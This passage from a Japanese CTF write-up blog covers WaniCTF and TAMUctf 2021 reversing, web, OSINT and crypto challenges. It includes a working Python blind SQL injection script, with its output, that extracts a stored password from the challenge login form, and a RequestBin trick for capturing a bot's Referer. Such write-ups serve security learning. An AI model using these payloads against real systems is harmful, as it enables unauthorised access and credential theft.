                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0x27] +
                                                        (int)(char)param_1[0x1e] == 0x69) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((param_1[8] ^ param_1[0x1e]) == 0x40) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x1e] -
                                                            (int)(char)param_1[0x25] == -0x29) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((param_1[0x15] ^ param_1[0x1d]) == 0x29) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x23] +
                                                          (int)(char)param_1[0x1d] == 0xd4) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x1d] -
                                                            (int)(char)param_1[0xb] == 0x31) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((param_1[0x16] ^ param_1[0x1c]) == 8) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((param_1[0x16] ^ param_1[0x1c]) == 9) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x2c] +
                                                            (int)(char)param_1[0x1c] == 0x71) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0x1b] -
                                                        (int)(char)param_1[0x3d] == 0xe) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[2] +
                                                          (int)(char)param_1[0x1b] == 0xbf) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x3e] +
                                                            (int)(char)param_1[0x1b] == 0xfc) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((param_1[0x3c] ^ param_1[0x1a]) == 0x53) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x1a] -
                                                          (int)(char)param_1[0x33] == 0x34) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x1a] -
                                                            (int)(char)param_1[0x24] == 0x37) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((param_1[1] ^ param_1[0x19]) == 0x23) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((param_1[4] ^ param_1[0x19]) == 0xc) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((param_1[0x1f] ^ param_1[0x19]) == 9) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((param_1[7] ^ param_1[0x18]) == 9) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((param_1[0x12] ^ param_1[0x18]) == 4) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x18] -
                                                            (int)(char)param_1[0x14] == -0x2b) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0x17] -
                                                        (int)(char)param_1[0x1d] == 0x22) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((param_1[0x25] ^ param_1[0x17]) == 0x1e) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        uVar1 = 1;
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0x11] +
                                                        (int)(char)param_1[0x16] == 0xa5) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x31] +
                                                          (int)(char)param_1[0x16] == 0x65) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x17] +
                                                            (int)(char)param_1[0x16] == 0xad) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0x15] -
                                                        (int)(char)param_1[0x12] == 0x44) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x1e] +
                                                          (int)(char)param_1[0x15] == 0xad) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x15] -
                                                            (int)(char)param_1[0x1d] == 0x12) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0x14] -
                                                        (int)(char)param_1[0x1e] == 0x34) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[9] +
                                                          (int)(char)param_1[0x14] == 0xbf) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((param_1[0x2d] ^ param_1[0x14]) == 0x6a)
                                                        {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0x13] -
                                                        (int)(char)param_1[5] == 0x42) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x13] -
                                                          (int)(char)param_1[0x1c] == 0x48) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((param_1[0xf] ^ param_1[0x13]) == 0x4a)
                                                        {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((param_1[6] ^ param_1[0x12]) == 0x5c) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x12] -
                                                          (int)(char)param_1[0x23] == -0x31) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0xd] +
                                                            (int)(char)param_1[0x12] == 0x6e) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0x11] -
                                                        (int)(char)param_1[0x3c] == 0x41) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x11] -
                                                          (int)(char)param_1[7] == 0x3f) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x17] +
                                                            (int)(char)param_1[0x11] == 0xea) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[1] +
                                                        (int)(char)param_1[0x10] == 0xc5) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x15] +
                                                          (int)(char)param_1[0x10] == 0xeb) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x10] -
                                                            (int)(char)param_1[0x1e] == 0x41) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0x29] +
                                                        (int)(char)param_1[0xf] == 0x69) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x17] +
                                                          (int)(char)param_1[0xf] == 0xb5) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0xf] -
                                                            (int)(char)param_1[0x33] == 3) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0xe] -
                                                        (int)(char)param_1[0x31] == 0x34) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x3d] +
                                                          (int)(char)param_1[0xe] == 0xcc) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x17] +
                                                            (int)(char)param_1[0xe] == 0xd8) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((param_1[0x3a] ^ param_1[0xd]) == 0xd) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0xd] -
                                                          (int)(char)param_1[0x32] == -0x37) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0xd] -
                                                            (int)(char)param_1[0x23] == -0x37) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0x32] +
                                                        (int)(char)param_1[0xc] == 0xcf) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x27] +
                                                          (int)(char)param_1[0xc] == 0x95) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0xc] -
                                                            (int)(char)param_1[0xe] == 4) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0xb] -
                                                        (int)(char)param_1[0x23] == -0x2d) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0xb] -
                                                          (int)(char)param_1[0x16] == 10) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0xb] -
                                                            (int)(char)param_1[0x15] == -0x32) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[10] -
                                                        (int)(char)param_1[0x3d] == -0x33) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((param_1[0x31] ^ param_1[10]) == 0xc) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((param_1[0x21] ^ param_1[10]) == 0x5a) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[9] -
                                                        (int)(char)param_1[0xb] == 0x32) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((param_1[0x1a] ^ param_1[9]) == 0x33) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[9] -
                                                            (int)(char)param_1[0x2b] == -0x13) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0x35] +
                                                        (int)(char)param_1[8] == 0xf4) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[0x3f] +
                                                          (int)(char)param_1[8] == 0x86) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[8] -
                                                            (int)(char)param_1[0x2a] == 0x15) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[0xb] +
                                                        (int)(char)param_1[7] == 0x6e) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[5] +
                                                          (int)(char)param_1[7] == 0x72) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if (param_1[7] == param_1[0x3b]) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  }
                                                  else {
                                                    if ((param_1[0x38] ^ param_1[6]) == 0x58) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((int)(char)param_1[6] -
                                                          (int)(char)param_1[0x2a] == 0x11) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        if ((int)(char)param_1[0x10] +
                                                            (int)(char)param_1[6] == 0xeb) {
                                                          uVar1 = 1;
                                                        }
                                                        else {
                                                          uVar1 = 1;
                                                        }
                                                      }
                                                    }
                                                  }
                                                  }
                                                  }
                                                }
                                                else {
                                                  if ((param_1[0x1c] ^ param_1[5]) == 0xf) {
                                                    uVar1 = 1;
                                                  }
                                                  else {
                                                    if ((int)(char)param_1[5] -
                                                        (int)(char)param_1[0x17] == -0x41) {
                                                      uVar1 = 1;
                                                    }
                                                    else {
                                                      if ((param_1[0x1c] ^ param_1[5]) == 0xe) {
                                                        uVar1 = 1;
                                                      }
                                                      else {
                                                        uVar1 = 1;
                                                      }
                                                    }
                                                  }
                                                }
                                              }
                                            }
                                          }
                                        }
                                        else {
                                          if ((param_1[0x2a] ^ param_1[4]) == 0x11) {
                                            uVar1 = 1;
                                          }
                                          else {
                                            if ((param_1[0x18] ^ param_1[4]) == 0x41) {
                                              uVar1 = 1;
                                            }
                                            else {
                                              if ((int)(char)param_1[4] - (int)(char)param_1[5] ==
                                                  0x4f) {
                                                uVar1 = 1;
                                              }
                                              else {
                                                uVar1 = 1;
                                              }
                                            }
                                          }
                                        }
                                      }
                                    }
                                  }
                                }
                                else {
                                  if ((int)(char)param_1[0xc] + (int)(char)param_1[3] == 0xab) {
                                    uVar1 = 1;
                                  }
                                  else {
                                    if ((int)(char)param_1[3] - (int)(char)param_1[0x11] == -0x26) {
                                      uVar1 = 1;
                                    }
                                    else {
                                      if ((int)(char)param_1[3] - (int)(char)param_1[0x1d] == -0x11)
                                      {
                                        uVar1 = 1;
                                      }
                                      else {
                                        uVar1 = 1;
                                      }
                                    }
                                  }
                                }
                              }
                            }
                          }
                        }
                        else {
                          if ((int)(char)param_1[0x32] + (int)(char)param_1[2] == 0xb8) {
                            uVar1 = 1;
                          }
                          else {
                            if ((int)(char)param_1[6] + (int)(char)param_1[2] == 0xb7) {
                              uVar1 = 1;
                            }
                            else {
                              uVar1 = 1;
                            }
                          }
                        }
                      }
                    }
                  }
                }
                else {
                  if ((param_1[0xd] ^ param_1[1]) == 0x74) {
                    uVar1 = 1;
                  }
                  else {
                    if ((int)(char)param_1[1] - (int)(char)param_1[0x1c] == 0x1d) {
                      uVar1 = 1;
                    }
                    else {
                      if ((int)(char)param_1[1] - (int)(char)param_1[10] == 0x1f) {
                        uVar1 = 1;
                      }
                      else {
                        uVar1 = 1;
                      }
                    }
                  }
                }
              }
            }
          }
        }
        else {
          if ((int)(char)param_1[0x36] + (int)(char)*param_1 == 0x7d) {
            uVar1 = 1;
          }
          else {
            if ((int)(char)param_1[0x37] + (int)(char)*param_1 == 0x7a) {
              uVar1 = 1;
            }
            else {
              if ((int)(char)param_1[0x10] + (int)(char)*param_1 == 0xc3) {
                uVar1 = 1;
              }
              else {
                uVar1 = 1;
              }
            }
          }
        }
      }
    }
  }
  return uVar1;
}

check関数でuVar1が1にならないルートを探す必要がある。angrで何とか解こうとしたが、コードが悪いのかうまくいかない。別の方法を考え、uVar1=1にならないよう、==の条件のみ取り出し、z3で解く。

from z3 import *

flaglen = 0x3f

x = [BitVec('x%d' % i, 8) for i in range(flaglen)]
s = Solver()

s.add(x[0] == 0x46)
s.add(x[1] - x[0] == 6)
s.add(x[1] ^ x[2] == 0xd)
s.add(x[2] ^ x[3] == 6)
s.add(x[3] ^ x[4] == 0x3c)
s.add(x[4] ^ x[5] == 0x4f)
s.add(x[5] ^ x[6] == 0x5a)
s.add(x[7] - x[6] == -0x38)
s.add(x[7] ^ x[8] == 0x44)
s.add(x[9] - x[8] == -0x13)
s.add(x[9] ^ x[10] == 0x6e)
s.add(x[10] + x[0xb] == 0x66)
s.add(x[0xb] + x[0xc] == 0x94)
s.add(x[0xd] - x[0xc] == -0x2b)
s.add(x[0xd] ^ x[0xe] == 0x6b)
s.add(x[0xe] ^ x[0xf] == 0x6a)
s.add(x[0xf] ^ x[0x10] == 0x40)
s.add(x[0x10] + x[0x11] == 0xe5)
s.add(x[0x12] - x[0x11] == -0x3d)
s.add(x[0x12] ^ x[0x13] == 0x41)
s.add(x[0x13] ^ x[0x14] == 0x2d)
s.add(x[0x14] ^ x[0x15] == 0x2f)
s.add(x[0x15] ^ x[0x16] == 0x40)
s.add(x[0x16] + x[0x17] == 0xa7)
s.add(x[0x17] ^ x[0x18] == 0x44)
s.add(x[0x18] + x[0x19] == 0xa5)
s.add(x[0x1a] - x[0x19] == -0xc)
s.add(x[0x1a] + x[0x1b] == 0xdb)
s.add(x[0x1b] + x[0x1c] == 0xa6)
s.add(x[0x1c] + x[0x1d] == 0x90)
s.add(x[0x1e] - x[0x1d] == -0x2a)
s.add(x[0x1f] - x[0x1e] == 0x44)
s.add(x[0x20] - x[0x1f] == -0xc)
s.add(x[0x21] - x[0x20] == -0xb)
s.add(x[0x21] + x[0x22] == 0x92)
s.add(x[0x23] - x[0x22] == 0x3c)
s.add(x[0x24] - x[0x23] == -0x3b)
s.add(x[0x25] - x[0x24] == 0x32)
s.add(x[0x25] ^ x[0x26] == 0x3c)
s.add(x[0x26] + x[0x27] == 0x92)
s.add(x[0x27] ^ x[0x28] == 0x4b)
s.add(x[0x28] + x[0x29] == 0xab)
s.add(x[0x29] ^ x[0x2a] == 0x50)
s.add(x[0x2b] - x[0x2a] == 0x12)
s.add(x[0x2b] ^ x[0x2c] == 0x42)
s.add(x[0x2c] ^ x[0x2d] == 6)
s.add(x[0x2d] ^ x[0x2e] == 1)
s.add(x[0x2e] + x[0x2f] == 0x9e)
s.add(x[0x2f] ^ x[0x30] == 0x31)
s.add(x[0x30] ^ x[0x31] == 0x6b)
s.add(x[0x32] - x[0x31] == 0x3a)
s.add(x[0x33] - x[0x32] == -0x3a)
s.add(x[0x33] + x[0x34] == 0xa0)
s.add(x[0x35] - x[0x34] == 0xd)
s.add(x[0x35] ^ x[0x36] == 0x4c)
s.add(x[0x37] - x[0x36] == -4)
s.add(x[0x37] + x[0x38] == 0x66)
s.add(x[0x38] + x[0x39] == 0x94)
s.add(x[0x3a] - x[0x39] == -0x28)
s.add(x[0x3b] - x[0x3a] == -7)
s.add(x[0x3c] == x[0x3b])
s.add(x[0x3c] + x[0x3d] == 0x9c)
s.add(x[0x3e] - x[0x3d] == 0x11)

r = s.check()
if r == sat:
    m = s.model()
    flag = ''
    for i in range(flaglen):
        flag += chr(m[x[i]].as_long())
    print flag
FLAG{4n6r_15_4_5up3r_p0w3rfu1_5ymb0l1c_3x3cu710n_4n4ly515_700l}

fake (Web)

リンクがたくさん画面にある。HTMLソースを見ると1つの「Link」だけ別のページにリンクしている。

    <a href="144c9defac04969c7bfad8efaa8ea194.html" style="display: none;">
      <button type="button" class="btn btn-primary">Link</button>
    </a>

https://fake.web.wanictf.org/144c9defac04969c7bfad8efaa8ea194.htmlにアクセスすると、フラグが書いてあった。

FLAG{wow_y0u_h4ve_3po4ted_th3_7ake}

Wani Request 1 (Web)

あどみんちゃんに送信したURLにアクセスしてもらい、フラグに関する情報を探す。RequestBinのURLを送信し、RequestBin側で通信の情報を見る。

Host: requestbin.net

Connection: close

Accept-Encoding: gzip

Cf-Ipcountry: JP

X-Forwarded-For: 13.230.177.250, 103.22.201.210

Cf-Ray: 647e6012abf4efb6-NRT

X-Forwarded-Proto: http

Cf-Visitor: {"scheme":"https"}

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/81.0.4044.113 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Sec-Fetch-Site: cross-site

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Referer: http://w4ni-secre7-h1mitu-pa6e.s3-website-ap-northeast-1.amazonaws.com/?url=http://requestbin.net/r/4zb3b7gq

Accept-Language: en-US

Cf-Connecting-Ip: 13.230.177.250

Cdn-Loop: cloudflare

Cf-Request-Id: 09c2da5fa60000efb66482d000000001

X-Request-Id: ae05c014-3ba3-469a-9401-01dcbd6bcabe

X-Forwarded-Port: 80

Via: 1.1 vegur

Connect-Time: 0

X-Request-Start: 1619760597383

Total-Route-Time: 0

RefererのURL http://w4ni-secre7-h1mitu-pa6e.s3-website-ap-northeast-1.amazonaws.com/ にアクセスすると、フラグが書いてあった。

FLAG{h77p_r3f3r3r_15_54f3_42a2cc2f275}

watch animal (Web)

wanictf21spring@gmail.comのメアドの人のパスワードがフラグとのことで、Blind SQL Injectionでパスワードを求める。

import requests

url = 'https://watch.web.wanictf.org/'

passlen = -1
for i in range(1, 33):
    payload = {"email": "wanictf21spring@gmail.com",
        "password": "' or (SELECT length(password) FROM users WHERE id = 1) = " + str(i) + " -- -"}
    r = requests.post(url, data=payload)
    if 'Login Failed' not in r.text:
        passlen = i
        break

print '[+] Password Length is:', passlen

flag = ''
for i in range(1, passlen + 1):
    for code in range(33, 127):
        payload = {"email": "wanictf21spring@gmail.com",
            "password": "' or substr((SELECT password FROM users WHERE id = 1)," + str(i) + ",1)='" + chr(code) + "' -- -"}
        r = requests.post(url, data=payload)
        if 'Login Failed' not in r.text:
            flag += chr(code)
            break
    print '[+] flag:', flag

print '[*] flag:', flag

実行結果は以下の通り。

[+] Password Length is: 15
[+] flag: F
[+] flag: FL
[+] flag: FLA
[+] flag: FLAG
[+] flag: FLAG{
[+] flag: FLAG{b
[+] flag: FLAG{bl
[+] flag: FLAG{bl1
[+] flag: FLAG{bl1n
[+] flag: FLAG{bl1nd
[+] flag: FLAG{bl1ndS
[+] flag: FLAG{bl1ndSQ
[+] flag: FLAG{bl1ndSQL
[+] flag: FLAG{bl1ndSQLi
[+] flag: FLAG{bl1ndSQLi}
[*] flag: FLAG{bl1ndSQLi}
FLAG{bl1ndSQLi}

TAMUctf 2021 Writeup

この大会は2021/4/23 8:00(JST)~2021/4/26 8:00(JST)に開催されました。
今回もチームで参戦。結果は2100点で356チーム中36位でした。
自分で解けた問題をWriteupとして書いておきます。

Archival (OSINT 50)

Internet Archivehttps://tamuctf.com/を調べる。2020/11/12 01:37:48のものを見てみると、フラグが書いてあった。
f:id:satou-y:20210503083429p:plain

gigem{s1t3_und3r_c0n57ruc710n}

Acrylic (Reversing 100)

バイナリにはフラグ文字列がたくさん含まれている。どれが正解かわからない。Ghidraでデコンパイルして確認してみる。

char * get_flag(void)

{
  int local_10;
  uint local_c;
  
  local_10 = 0x7b;
  local_c = 0;
  while (local_c < 0x7e4) {
    local_10 = ((local_10 + 1) * local_10) % 0x7f;
    local_c = local_c + 1;
  }
  return flags + (long)local_10 * 0x40;
}

flagsのアドレスは0x00301020flags + 5632(=0x302620)が返却される。そのアドレスのデータを見る。

        00302620 67 69 67        ds         "gigem{counteradvise_orbitoides}"
                 65 6d 7b 
                 63 6f 75 
        00302640 00              ??         00h
        00302641 00              ??         00h
        00302642 00              ??         00h
        00302643 00              ??         00h
        00302644 00              ??         00h
        00302645 00              ??         00h
gigem{counteradvise_orbitoides}

Basic RSA (Crypto 100)

Nを素因数分解する。

N = 21094081 * 99363191

フラグの{}の中が1文字ずつ暗号化されているようなので、素因数分解の結果から1文字ずつ復号する。

from Crypto.Util.number import *

enc = [875597732337885, 1079270043421597, 616489707580218, 2010079518477891, 1620280754358135, 616660320758264, 86492804386481, 171830236437002, 1500250422231406, 234060757406619, 1461569132566245, 897825842938043, 2010079518477891, 234060757406619, 1620280754358135, 2010079518477891, 966944159095310, 1669094464917286, 1532683993596672, 171830236437002, 1461569132566245, 2010079518477891, 221195854354967, 1500250422231406, 234060757406619, 355168739080744, 616660320758264, 1620280754358135]

N = 2095975199372471
e = 5449
p = 21094081
q = 99363191
phi = (p - 1) * (q - 1)
d = inverse(e, phi)

flag = 'gigem{'
for c in enc:
    m = pow(c, d, N)
    flag += chr(m)
flag += '}'
print flag
gigem{RSA_s3cur1ty_1s_4b0ut_pr1m3s}

Ciphper (Crypto 100)

暗号化の処理概要は以下の通り。

・keyの指定がなければ、平文を返す。
・keyの長さが8バイトより短い場合はエラー
・n: keyの長さが32未満はその長さ、それ以外は32
・keyの各バイトは下5bitのみ有効

keyがフラグになっている。繰り返し、"gigem{" & ("\x1f" * 6) をXOR鍵として条件を満たす箇所を探す。

[+] index = 000 plaintext = to be
[+] index = 032 plaintext = uestio
[+] index = 052 plaintext = wirgvj
[+] index = 064 plaintext = e mind
[+] index = 074 plaintext = jnnodw
[+] index = 096 plaintext = arrows
[+] index = 128 plaintext = to tak
[+] index = 160 plaintext = oubles

鍵の長さは32。フラグは切れているかもしれないが、まずは32バイトを探すことを考える。平文は、ハムレットに出てくるセリフであると推測できる。
以下のURLの内容を参考にする。

https://en.wikipedia.org/wiki/To_be,_or_not_to_be
import string

def is_lowercase(s):
    chars = string.lowercase + ' '
    for c in s:
        if c not in chars:
            return False
    return True

with open('output.bin', 'rb') as f:
    enc = f.read()

flag_head = 'gigem{'

for i in range(len(enc) - len(flag_head) + 1):
    pt = ''
    for j in range(len(flag_head)):
        code = (ord(flag_head[j]) & 0x1f) ^ ord(enc[i+j])
        pt += chr(code)
    if is_lowercase(pt):
        print i

## guess from here (need to add 32 or 64 or 96)
pt = 'to be or not to be that is the q'
flag = flag_head
for i in range(6, 32):
    flag += chr((ord(enc[i]) ^ ord(pt[i])) + 96)

for i in range(0, len(enc), 32):
    pt = ''
    for j in range(len(flag)):
        if i + j == len(enc):
            break
        code = (ord(flag[j]) & 0x1f) ^ ord(enc[i+j])
        pt += chr(code)
    print '[+] index = %03d'%  i, 'plaintext =', pt

print '[*] flag =', flag

最終的なコードで実行した結果は以下の通り。

0
32
52
64
74
96
128
160
[+] index = 000 plaintext = to be or not to be that is the q
[+] index = 032 plaintext = uestion whether tis nobler in th
[+] index = 064 plaintext = e mind to suffer the slings and
[+] index = 096 plaintext = arrows of outrageous fortune or
[+] index = 128 plaintext = to take arms against a sea of tr
[+] index = 160 plaintext = oubles and by opposing end them
[*] flag = gigem{dont~roll~your~own~crypto}
gigem{dont~roll~your~own~crypto}

Encoding (Crypto 100)

ASCIIコードらしきものが並んでいるが、printableなコードではないものがある。4つの数値でグループ化すると、1つ目が134、2つ目が170、3つ目が63、4つ目が60か61になっている。4つ目だけを取り出し、2進数としてデコードする。するとbase32文字列になる。さらにデコードするとbase64文字列になる。最終的にはこれをデコードしたら、フラグになった。

from base64 import *

with open('data.txt', 'r') as f:
    data = f.read().rstrip()

codes = map(int, data.split(' '))

b_data = ''
for i in range(0, len(codes), 4):
    assert codes[i] == 134
    assert codes[i+1] == 170
    assert codes[i+2] == 63
    b_data += str(codes[i+3] - 60)

msg = ''
for i in range(0, len(b_data), 8):
    msg += chr(int(b_data[i:i+8], 2))
print msg

msg = b32decode(msg)
print msg

flag = b64decode(msg)
print flag

実行結果は以下の通り。

LIZGY3S2K4YTOTJSGVVE2R2SOBRG2ZDGJVME4ZTCNJBDAWBSJZ4WKWCCGBGUMOBQJVVGOMCNNJSDS===
Z2lnZW17M25jMGRpbmdfMXNfbjB0X2NyeXB0MF80Mjg0Mjd9
gigem{3nc0ding_1s_n0t_crypt0_428427}
gigem{3nc0ding_1s_n0t_crypt0_428427}

Ring Of Fire (Crypto 100)

"Love is a burning thing"から始まるこの歌詞とのXORをとる。歌詞は問題に書かれているものだと不足しているので、続きを調べる。歌詞はhttps://genius.com/Johnny-cash-ring-of-fire-lyricsに載っている。歌詞は以下の通り。

Love is a burning thing
And it makes a fiery ring
Bound by wild desire
I fell in to a ring of fire

I fell into a burning ring of fire
I went down, down, down
And the flames went higher
And it burns, burns, burns
The ring of fire
The ring of fire
I fell into a burning ring of fire
I went down, down, down
And the flames went higher
And it burns, burns, burns
The ring of fire
The ring of fire

The taste of love is sweet
When hearts like ours meet
I fell for you like a child
Oh, but the fire went wild

I fell in to a burning ring of fire
I went down, down, down
And the flames went higher
And it burns, burns, burns
The ring of fire
The ring of fire
    :
with open('codeFile.txt', 'r') as f:
    data = f.read().rstrip()

ct = ''
for i in range(0, len(data), 8):
    ct += chr(int(data[i:i+8], 2))

key = '''Love is a burning thing
